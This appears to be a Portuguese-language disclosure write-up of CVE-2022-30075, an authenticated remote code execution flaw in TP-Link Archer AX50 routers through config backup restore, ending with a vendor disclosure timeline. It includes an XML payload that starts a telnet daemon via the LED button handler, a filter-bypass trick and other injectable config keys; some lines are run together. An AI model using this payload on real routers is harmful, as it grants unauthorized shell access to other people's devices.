
Tp-Link Archer AX50 RCE autenticado (CVE-2022-30075)
Execução Remota de Código Autenticada em Roteadores Tp-Link
Se o seu roteador Tp-Link possui funcionalidade de backup e restauração e o firmware é anterior a junho de 2022, ele provavelmente está vulnerável
Tp-Link Archer AX50, outros roteadores tplink podem usar formato diferente de backups e o exploit precisa ser modificado
Usando o exploit para iniciar o daemon telnet no roteador

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler, mas ela pode ser facilmente contornada alterando o nome do nó xml pai (por exemplo, name="exploit")system.button.handler, mas também usando ddns.service.ip_script, firewall.include.path, uhttpd.main e outros.../usr/sbin/telnetd -l /bin/login.shtelnet 192.168.1.115.03.2022 - Vulnerabilidade identificada
15.03.2022 - Suporte da Tp-Link contatado
16.03.2022 - Resposta recebida da Tp-Link
02.05.2022 - CVE atribuído
27.05.2022 - Tp-Link lançou firmware com a vulnerabilidade corrigida
07.06.2022 - Detalhes técnicos publicados